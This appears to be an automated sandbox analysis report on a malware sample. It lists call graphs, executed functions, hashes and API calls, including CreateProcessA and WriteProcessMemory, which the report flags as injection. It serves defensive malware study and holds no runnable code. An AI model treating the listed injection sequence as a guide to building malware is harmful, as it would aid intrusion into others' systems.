39749->39753 39758 25cfa48 39749->39758 39750 25cdd01 39750->39745 39754 25cfa85 39753->39754 39755 25cfa79 39753->39755 39754->39750 39755->39754 39763 4d109c0 39755->39763 39768 4d109b2 39755->39768 39759 25cfa79 39758->39759 39760 25cfa85 39758->39760 39759->39760 39761 4d109c0 2 API calls 39759->39761 39762 4d109b2 2 API calls 39759->39762 39760->39750 39761->39760 39762->39760 39764 4d109eb 39763->39764 39765 4d10a9a 39764->39765 39773 4d11890 39764->39773 39777 4d118a0 39764->39777 39769 4d109eb 39768->39769 39770 4d10a9a 39769->39770 39771 4d11890 2 API calls 39769->39771 39772 4d118a0 2 API calls 39769->39772 39771->39770 39772->39770 39775 4d118f0 CreateWindowExW 39773->39775 39776 4d118e5 CreateWindowExW 39773->39776 39774 4d118d5 39774->39765 39775->39774 39776->39774 39778 4d118d5 39777->39778 39779 4d118f0 CreateWindowExW 39777->39779 39780 4d118e5 CreateWindowExW 39777->39780 39778->39765 39779->39778 39780->39778 39782 4d1df5b 39781->39782 39784 25c82ea 2 API calls 39782->39784 39785 25c5ce4 2 API calls 39782->39785 39783 4d1f37c 39783->39693 39784->39783 39785->39783 39452 25cac90 39453 25cac9f 39452->39453 39456 25cad88 39452->39456 39461 25cad79 39452->39461 39457 25cadbc 39456->39457 39458 25cad99 39456->39458 39457->39453 39458->39457 39459 25cafc0 GetModuleHandleW 39458->39459 39460 25cafed 39459->39460 39460->39453 39462 25cadbc 39461->39462 39463 25cad99 39461->39463 39462->39453 39463->39462 39464 25cafc0 GetModuleHandleW 39463->39464 39465 25cafed 39464->39465 39465->39453 39825 6ece350 39826 6ece4db 39825->39826 39828 6ece376 39825->39828 39828->39826 39829 6ec8730 39828->39829 39830 6ece5d0 PostMessageW 39829->39830 39831 6ece63c 39830->39831 39831->39828

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 04D17278 Relevance: 2.3, Strings: 1, Instructions: 1043COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 480 4d17278-4d172a3 481 4d172a5 480->481 482 4d172aa-4d1772f call 4d16994 call 4d17074 call 4d17084 call 4d16994 call 4d17074 call 4d17094 call 4d170a4 call 4d170b4 call 4d170c4 call 4d170d4 call 4d170e4 call 4d170b4 call 4d170c4 call 4d170d4 call 4d170e4 call 4d170f4 call 4d17104 480->482 481->482 549 4d17888-4d178a1 482->549 550 4d17734-4d17752 549->550 551 4d178a7-4d178e5 549->551 552 4d17754 550->552 553 4d17759-4d17773 550->553 561 4d178e7 551->561 562 4d178ec-4d1795d 551->562 552->553 555 4d17775 553->555 556 4d1777a-4d17790 553->556 555->556 557 4d17792 556->557 558 4d17797-4d177ba call 4d17114 556->558 557->558 564 4d177c1-4d177d1 558->564 565 4d177bc 558->565 561->562 580 4d17987 562->580 581 4d1795f-4d1796b 562->581 567 4d177d3 564->567 568 4d177d8-4d17812 564->568 565->564 567->568 569 4d17814-4d1781b 568->569 570 4d1781d 568->570 571 4d17824-4d17842 569->571 570->571 573 4d17844 571->573 574 4d17849-4d1785a 571->574 573->574 575 4d17861-4d17876 574->575 576 4d1785c 574->576 582 4d17878 575->582 583 4d1787d-4d17885 575->583 576->575 586 4d1798d-4d179ab 580->586 584 4d17975-4d1797b 581->584 585 4d1796d-4d17973 581->585 582->583 583->549 587 4d17985 584->587 585->587 589 4d179b2-4d17a6d 586->589 590 4d179ad 586->590 587->586 598 4d17a75-4d18403 call 4d17124 call 4d17134 call 4d170b4 call 4d170c4 call 4d170d4 call 4d170e4 call 4d170b4 call 4d170c4 call 4d17144 call 4d170d4 call 4d170e4 call 4d170b4 call 4d170c4 call 4d170d4 call 4d170e4 call 4d17124 call 4d17134 call 4d17154 call 4d170b4 call 4d170c4 call 4d170d4 call 4d170e4 call 4d170b4 call 4d170c4 call 4d170d4 call 4d17164 call 4d17174 call 4d17184 call 4d17194 call 4d171a4 call 4d171b4 call 4d171c4 * 7 call 4d170c4 call 4d171d4 call 4d171e4 call 4d171f4 call 4d17204 call 4d17214 589->598 590->589
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1689843291.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_4d10000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $Dp
                                                                                                                                                  • API String ID: 0-3490387063
                                                                                                                                                  • Opcode ID: cfd7e487f26de5d26482c1429063179246715103d157ec2131a366ab6809d11f
                                                                                                                                                  • Instruction ID: d1d03923c607bb4bcdf835ad7e0b215dbab4c95d058a30664546ef1db7fe727f
                                                                                                                                                  • Opcode Fuzzy Hash: cfd7e487f26de5d26482c1429063179246715103d157ec2131a366ab6809d11f
                                                                                                                                                  • Instruction Fuzzy Hash: 91B2B434A002199FDB14DF64D884ADDB7B2FF8A304F1181E9E949AB365DB31AE85CF50
                                                                                                                                                  Function 04D17269 Relevance: 2.2, Strings: 1, Instructions: 947COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 728 4d17269-4d172a3 729 4d172a5 728->729 730 4d172aa-4d17348 call 4d16994 728->730 729->730 739 4d17352-4d1735e call 4d17074 730->739 741 4d17363-4d1737a 739->741 743 4d17384-4d17390 call 4d17084 741->743 745 4d17395-4d17410 call 4d16994 call 4d17074 743->745 755 4d1741a-4d17426 call 4d17094 745->755 757 4d1742b-4d174b4 call 4d170a4 755->757 765 4d174bf-4d174d6 call 4d170b4 757->765 767 4d174db-4d17538 call 4d170c4 call 4d170d4 765->767 772 4d1753d-4d17551 call 4d170e4 767->772 774 4d17556-4d175b3 772->774 777 4d175be-4d175d5 call 4d170b4 774->777 779 4d175da-4d17650 call 4d170c4 call 4d170d4 call 4d170e4 777->779 786 4d17655-4d1766a 779->786 787 4d1766f-4d1772f call 4d170f4 call 4d17104 786->787 797 4d17888-4d178a1 787->797 798 4d17734-4d17752 797->798 799 4d178a7-4d178e5 797->799 800 4d17754 798->800 801 4d17759-4d17773 798->801 809 4d178e7 799->809 810 4d178ec-4d17927 799->810 800->801 803 4d17775 801->803 804 4d1777a-4d17790 801->804 803->804 805 4d17792 804->805 806 4d17797-4d177ba call 4d17114 804->806 805->806 812 4d177c1-4d177d1 806->812 813 4d177bc 806->813 809->810 825 4d1792e-4d17944 810->825 815 4d177d3 812->815 816 4d177d8-4d17812 812->816 813->812 815->816 817 4d17814-4d1781b 816->817 818 4d1781d 816->818 819 4d17824-4d17842 817->819 818->819 821 4d17844 819->821 822 4d17849-4d1785a 819->822 821->822 823 4d17861-4d17876 822->823 824 4d1785c 822->824 830 4d17878 823->830 831 4d1787d-4d17885 823->831 824->823 827 4d17950-4d1795d 825->827 828 4d17987 827->828 829 4d1795f-4d1796b 827->829 834 4d1798d-4d17995 828->834 832 4d17975-4d1797b 829->832 833 4d1796d-4d17973 829->833 830->831 831->797 835 4d17985 832->835 833->835 836 4d1799b-4d179ab 834->836 835->834 837 4d179b2-4d17a54 836->837 838 4d179ad 836->838 845 4d17a5e-4d17a6d 837->845 838->837 846 4d17a75-4d18403 call 4d17124 call 4d17134 call 4d170b4 call 4d170c4 call 4d170d4 call 4d170e4 call 4d170b4 call 4d170c4 call 4d17144 call 4d170d4 call 4d170e4 call 4d170b4 call 4d170c4 call 4d170d4 call 4d170e4 call 4d17124 call 4d17134 call 4d17154 call 4d170b4 call 4d170c4 call 4d170d4 call 4d170e4 call 4d170b4 call 4d170c4 call 4d170d4 call 4d17164 call 4d17174 call 4d17184 call 4d17194 call 4d171a4 call 4d171b4 call 4d171c4 * 7 call 4d170c4 call 4d171d4 call 4d171e4 call 4d171f4 call 4d17204 call 4d17214 845->846
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1689843291.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_4d10000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $Dp
                                                                                                                                                  • API String ID: 0-3490387063
                                                                                                                                                  • Opcode ID: 50eb044d83e06cf945e90669d5c2a2bd39dc135668349084cc6c414f4f03224f
                                                                                                                                                  • Instruction ID: 9fd5dc0b0537a36850e4e09d9e9f33726b8ed11d583bd4c2bd8f270c5c49db19
                                                                                                                                                  • Opcode Fuzzy Hash: 50eb044d83e06cf945e90669d5c2a2bd39dc135668349084cc6c414f4f03224f
                                                                                                                                                  • Instruction Fuzzy Hash: 05A2C534A00219DFDB14DF64D894AE9B7B2FF8A304F1181E9E9496B361DB31AE85CF50
                                                                                                                                                  Function 06ECF280 Relevance: .6, Instructions: 631COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 7a2c0edad5600de41782bbbb7272dc46155e254cddc61c2ea81142b5473b04a2
                                                                                                                                                  • Instruction ID: 6ce687a7f9cce76108bc486d118ca04d2cd8f2f0fec87a4cd15ceb3f9de2226b
                                                                                                                                                  • Opcode Fuzzy Hash: 7a2c0edad5600de41782bbbb7272dc46155e254cddc61c2ea81142b5473b04a2
                                                                                                                                                  • Instruction Fuzzy Hash: 13327931B012049FDB58DBA9C654BAEBBF7AF88714F24446DE505AB3A1DB34ED02CB50
                                                                                                                                                  Function 06ECBDED Relevance: 1.8, APIs: 1, Instructions: 250processCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 976 6ecbded-6ecbe8d 978 6ecbe8f-6ecbe99 976->978 979 6ecbec6-6ecbee6 976->979 978->979 980 6ecbe9b-6ecbe9d 978->980 984 6ecbf1f-6ecbf4e 979->984 985 6ecbee8-6ecbef2 979->985 982 6ecbe9f-6ecbea9 980->982 983 6ecbec0-6ecbec3 980->983 986 6ecbead-6ecbebc 982->986 987 6ecbeab 982->987 983->979 995 6ecbf87-6ecc041 CreateProcessA 984->995 996 6ecbf50-6ecbf5a 984->996 985->984 988 6ecbef4-6ecbef6 985->988 986->986 989 6ecbebe 986->989 987->986 990 6ecbef8-6ecbf02 988->990 991 6ecbf19-6ecbf1c 988->991 989->983 993 6ecbf04 990->993 994 6ecbf06-6ecbf15 990->994 991->984 993->994 994->994 997 6ecbf17 994->997 1007 6ecc04a-6ecc0d0 995->1007 1008 6ecc043-6ecc049 995->1008 996->995 998 6ecbf5c-6ecbf5e 996->998 997->991 999 6ecbf60-6ecbf6a 998->999 1000 6ecbf81-6ecbf84 998->1000 1002 6ecbf6c 999->1002 1003 6ecbf6e-6ecbf7d 999->1003 1000->995 1002->1003 1003->1003 1004 6ecbf7f 1003->1004 1004->1000 1018 6ecc0e0-6ecc0e4 1007->1018 1019 6ecc0d2-6ecc0d6 1007->1019 1008->1007 1021 6ecc0f4-6ecc0f8 1018->1021 1022 6ecc0e6-6ecc0ea 1018->1022 1019->1018 1020 6ecc0d8 1019->1020 1020->1018 1024 6ecc108-6ecc10c 1021->1024 1025 6ecc0fa-6ecc0fe 1021->1025 1022->1021 1023 6ecc0ec 1022->1023 1023->1021 1027 6ecc11e-6ecc125 1024->1027 1028 6ecc10e-6ecc114 1024->1028 1025->1024 1026 6ecc100 1025->1026 1026->1024 1029 6ecc13c 1027->1029 1030 6ecc127-6ecc136 1027->1030 1028->1027 1032 6ecc13d 1029->1032 1030->1029 1032->1032
                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06ECC02E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                  • Opcode ID: 379eba00135998b297217776c4e19b4af7ebdf231380595b4225c3329e90a90b
                                                                                                                                                  • Instruction ID: e28426b579a6d92bd0e0000c6a0091cd90ffc8e2eb21eb20f3fdd891c6adb607
                                                                                                                                                  • Opcode Fuzzy Hash: 379eba00135998b297217776c4e19b4af7ebdf231380595b4225c3329e90a90b
                                                                                                                                                  • Instruction Fuzzy Hash: EFA16D71D003599FEB50CFA8CD41BEDBBB2BF48314F1485A9E848A7280DB749986CF91
                                                                                                                                                  Function 06ECBDF8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1033 6ecbdf8-6ecbe8d 1035 6ecbe8f-6ecbe99 1033->1035 1036 6ecbec6-6ecbee6 1033->1036 1035->1036 1037 6ecbe9b-6ecbe9d 1035->1037 1041 6ecbf1f-6ecbf4e 1036->1041 1042 6ecbee8-6ecbef2 1036->1042 1039 6ecbe9f-6ecbea9 1037->1039 1040 6ecbec0-6ecbec3 1037->1040 1043 6ecbead-6ecbebc 1039->1043 1044 6ecbeab 1039->1044 1040->1036 1052 6ecbf87-6ecc041 CreateProcessA 1041->1052 1053 6ecbf50-6ecbf5a 1041->1053 1042->1041 1045 6ecbef4-6ecbef6 1042->1045 1043->1043 1046 6ecbebe 1043->1046 1044->1043 1047 6ecbef8-6ecbf02 1045->1047 1048 6ecbf19-6ecbf1c 1045->1048 1046->1040 1050 6ecbf04 1047->1050 1051 6ecbf06-6ecbf15 1047->1051 1048->1041 1050->1051 1051->1051 1054 6ecbf17 1051->1054 1064 6ecc04a-6ecc0d0 1052->1064 1065 6ecc043-6ecc049 1052->1065 1053->1052 1055 6ecbf5c-6ecbf5e 1053->1055 1054->1048 1056 6ecbf60-6ecbf6a 1055->1056 1057 6ecbf81-6ecbf84 1055->1057 1059 6ecbf6c 1056->1059 1060 6ecbf6e-6ecbf7d 1056->1060 1057->1052 1059->1060 1060->1060 1061 6ecbf7f 1060->1061 1061->1057 1075 6ecc0e0-6ecc0e4 1064->1075 1076 6ecc0d2-6ecc0d6 1064->1076 1065->1064 1078 6ecc0f4-6ecc0f8 1075->1078 1079 6ecc0e6-6ecc0ea 1075->1079 1076->1075 1077 6ecc0d8 1076->1077 1077->1075 1081 6ecc108-6ecc10c 1078->1081 1082 6ecc0fa-6ecc0fe 1078->1082 1079->1078 1080 6ecc0ec 1079->1080 1080->1078 1084 6ecc11e-6ecc125 1081->1084 1085 6ecc10e-6ecc114 1081->1085 1082->1081 1083 6ecc100 1082->1083 1083->1081 1086 6ecc13c 1084->1086 1087 6ecc127-6ecc136 1084->1087 1085->1084 1089 6ecc13d 1086->1089 1087->1086 1089->1089
                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06ECC02E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                  • Opcode ID: e7e78a8321a6164fe55b63f8ef895a9ca94c8d44fae5d857b6ae56ddcbaa4acf
                                                                                                                                                  • Instruction ID: 25abcf92978724a14d96ff5d0d1b354f460c9017a2173e5fefdc73bb6ea9885b
                                                                                                                                                  • Opcode Fuzzy Hash: e7e78a8321a6164fe55b63f8ef895a9ca94c8d44fae5d857b6ae56ddcbaa4acf
                                                                                                                                                  • Instruction Fuzzy Hash: B7915D71D003598FEB60CFA8C941BEDBBB2BF44314F1485A9E849A7280DB759986CF91
                                                                                                                                                  Function 025CAD88 Relevance: 1.7, APIs: 1, Instructions: 192COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1090 25cad88-25cad97 1091 25cad99-25cada6 call 25ca0e0 1090->1091 1092 25cadc3-25cadc7 1090->1092 1098 25cadbc 1091->1098 1099 25cada8 1091->1099 1094 25cadc9-25cadd3 1092->1094 1095 25caddb-25cae1c 1092->1095 1094->1095 1101 25cae1e-25cae26 1095->1101 1102 25cae29-25cae37 1095->1102 1098->1092 1145 25cadae call 25cb010 1099->1145 1146 25cadae call 25cb020 1099->1146 1101->1102 1103 25cae39-25cae3e 1102->1103 1104 25cae5b-25cae5d 1102->1104 1106 25cae49 1103->1106 1107 25cae40-25cae47 call 25ca0ec 1103->1107 1108 25cae60-25cae67 1104->1108 1105 25cadb4-25cadb6 1105->1098 1109 25caef8-25cafb8 1105->1109 1111 25cae4b-25cae59 1106->1111 1107->1111 1112 25cae69-25cae71 1108->1112 1113 25cae74-25cae7b 1108->1113 1140 25cafba-25cafbd 1109->1140 1141 25cafc0-25cafeb GetModuleHandleW 1109->1141 1111->1108 1112->1113 1115 25cae7d-25cae85 1113->1115 1116 25cae88-25cae91 call 25ca0fc 1113->1116 1115->1116 1121 25cae9e-25caea3 1116->1121 1122 25cae93-25cae9b 1116->1122 1123 25caea5-25caeac 1121->1123 1124 25caec1-25caece 1121->1124 1122->1121 1123->1124 1126 25caeae-25caebe call 25ca10c call 25ca11c 1123->1126 1131 25caed0-25caeee 1124->1131 1132 25caef1-25caef7 1124->1132 1126->1124 1131->1132 1140->1141 1142 25cafed-25caff3 1141->1142 1143 25caff4-25cb008 1141->1143 1142->1143 1145->1105 1146->1105
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 025CAFDE
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1683604408.00000000025C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025C0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_25c0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                                  • Opcode ID: 935a8a9ea6d8950774fa028300ba35defd38a297cb1019308b17e4ca3046bb5a
                                                                                                                                                  • Instruction ID: 5041e7e533fab9d63bae084f4d9dfe80a4915a8aaec8e8c01e1bda5dd37ce3cb
                                                                                                                                                  • Opcode Fuzzy Hash: 935a8a9ea6d8950774fa028300ba35defd38a297cb1019308b17e4ca3046bb5a
                                                                                                                                                  • Instruction Fuzzy Hash: BD7137B0A00B098FDB24DF69D55579ABBF1FF88304F10892DD48AD7A50EB34E945CB94
                                                                                                                                                  Function 04D118E5 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1147 4d118e5-4d11956 1148 4d11961-4d11968 1147->1148 1149 4d11958-4d1195e 1147->1149 1150 4d11973-4d11a12 CreateWindowExW 1148->1150 1151 4d1196a-4d11970 1148->1151 1149->1148 1153 4d11a14-4d11a1a 1150->1153 1154 4d11a1b-4d11a53 1150->1154 1151->1150 1153->1154 1158 4d11a60 1154->1158 1159 4d11a55-4d11a58 1154->1159 1160 4d11a61 1158->1160 1159->1158 1160->1160
                                                                                                                                                  APIs
                                                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04D11A02
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1689843291.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_4d10000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 716092398-0
                                                                                                                                                  • Opcode ID: f21d1e1ab9d245b26c6e61ce1c03ba7b0df776887bf6b15d60bda83a5ad1336d
                                                                                                                                                  • Instruction ID: 411b16888afa35b1ba6901ad9acf50fbf4b8ec81635505ef797e5ae4718a3560
                                                                                                                                                  • Opcode Fuzzy Hash: f21d1e1ab9d245b26c6e61ce1c03ba7b0df776887bf6b15d60bda83a5ad1336d
                                                                                                                                                  • Instruction Fuzzy Hash: B551C0B1D00349EFDB14CFA9D880ADDBFB1BF48310F24826AE919AB250D775A985CF51
                                                                                                                                                  Function 04D118F0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1161 4d118f0-4d11956 1162 4d11961-4d11968 1161->1162 1163 4d11958-4d1195e 1161->1163 1164 4d11973-4d11a12 CreateWindowExW 1162->1164 1165 4d1196a-4d11970 1162->1165 1163->1162 1167 4d11a14-4d11a1a 1164->1167 1168 4d11a1b-4d11a53 1164->1168 1165->1164 1167->1168 1172 4d11a60 1168->1172 1173 4d11a55-4d11a58 1168->1173 1174 4d11a61 1172->1174 1173->1172 1174->1174
                                                                                                                                                  APIs
                                                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04D11A02
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1689843291.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_4d10000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 716092398-0
                                                                                                                                                  • Opcode ID: 0a3c2e33262efe22b45be7aa07ce49e3880450f717e91304d9a5425e958b8b2c
                                                                                                                                                  • Instruction ID: ca291c916124150caa3ea117dff97cb40b7da6277241d37de525d394169daff5
                                                                                                                                                  • Opcode Fuzzy Hash: 0a3c2e33262efe22b45be7aa07ce49e3880450f717e91304d9a5425e958b8b2c
                                                                                                                                                  • Instruction Fuzzy Hash: 5841C3B1D00349AFDF14CF99D884ADEBFB5BF48310F24822AE818AB250D775A945CF90
                                                                                                                                                  Function 025C44B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1175 25c44b4-25c59d9 CreateActCtxA 1178 25c59db-25c59e1 1175->1178 1179 25c59e2-25c5a3c 1175->1179 1178->1179 1186 25c5a3e-25c5a41 1179->1186 1187 25c5a4b-25c5a4f 1179->1187 1186->1187 1188 25c5a60 1187->1188 1189 25c5a51-25c5a5d 1187->1189 1191 25c5a61 1188->1191 1189->1188 1191->1191
                                                                                                                                                  APIs
                                                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 025C59C9
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1683604408.00000000025C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025C0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_25c0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Create
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2289755597-0
                                                                                                                                                  • Opcode ID: cfbe9aca82f4b46956d1872814cbc8641825a08d017296f1b0c6be9c9ed12b34
                                                                                                                                                  • Instruction ID: a264591873eaa1ebdc20791143d4b6dd8a7f6152afd0ec691d4ed3274b684dd4
                                                                                                                                                  • Opcode Fuzzy Hash: cfbe9aca82f4b46956d1872814cbc8641825a08d017296f1b0c6be9c9ed12b34
                                                                                                                                                  • Instruction Fuzzy Hash: A841C270C00619CFDB24CFAAC8447DDBBF5BF48314F6084AAD408AB255EB75A946CF50
                                                                                                                                                  Function 025C590C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1192 25c590c-25c59d9 CreateActCtxA 1194 25c59db-25c59e1 1192->1194 1195 25c59e2-25c5a3c 1192->1195 1194->1195 1202 25c5a3e-25c5a41 1195->1202 1203 25c5a4b-25c5a4f 1195->1203 1202->1203 1204 25c5a60 1203->1204 1205 25c5a51-25c5a5d 1203->1205 1207 25c5a61 1204->1207 1205->1204 1207->1207
                                                                                                                                                  APIs
                                                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 025C59C9
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1683604408.00000000025C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025C0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_25c0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Create
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2289755597-0
                                                                                                                                                  • Opcode ID: b0749de792a672738d19cd69bda0724b6f8ebaf83f10d1eb783ed5089baaa9c3
                                                                                                                                                  • Instruction ID: 430d0223166a8c88ff27ca13cc813bfe2a596ea785a1bf049cda422d7490c0d1
                                                                                                                                                  • Opcode Fuzzy Hash: b0749de792a672738d19cd69bda0724b6f8ebaf83f10d1eb783ed5089baaa9c3
                                                                                                                                                  • Instruction Fuzzy Hash: 5041D3B0C00619CFDB24CFAAC8847DDBBF5BF48314F60849AD408AB255EB756946CF50
                                                                                                                                                  Function 04D14050 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1208 4d14050-4d1408c 1209 4d14092-4d14097 1208->1209 1210 4d1413c-4d1415c 1208->1210 1211 4d14099-4d140d0 1209->1211 1212 4d140ea-4d14122 CallWindowProcW 1209->1212 1217 4d1415f-4d1416c 1210->1217 1218 4d140d2-4d140d8 1211->1218 1219 4d140d9-4d140e8 1211->1219 1213 4d14124-4d1412a 1212->1213 1214 4d1412b-4d1413a 1212->1214 1213->1214 1214->1217 1218->1219 1219->1217
                                                                                                                                                  APIs
                                                                                                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 04D14111
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1689843291.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_4d10000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CallProcWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2714655100-0
                                                                                                                                                  • Opcode ID: ab4fb7bbad26030b9b030da2b5b7dfc61bc276a9c893e063e75997e51c9309ed
                                                                                                                                                  • Instruction ID: 312438884f303e5d1a2d8e713d395421be6679f8fbdc8c747976d565da6e35a8
                                                                                                                                                  • Opcode Fuzzy Hash: ab4fb7bbad26030b9b030da2b5b7dfc61bc276a9c893e063e75997e51c9309ed
                                                                                                                                                  • Instruction Fuzzy Hash: 5A4108B9A00205DFDB14CF9AC848AAABBF5FB88314F248459D519AB361D375E841CFA1
                                                                                                                                                  Function 06ECBB69 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06ECBC00
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryProcessWrite
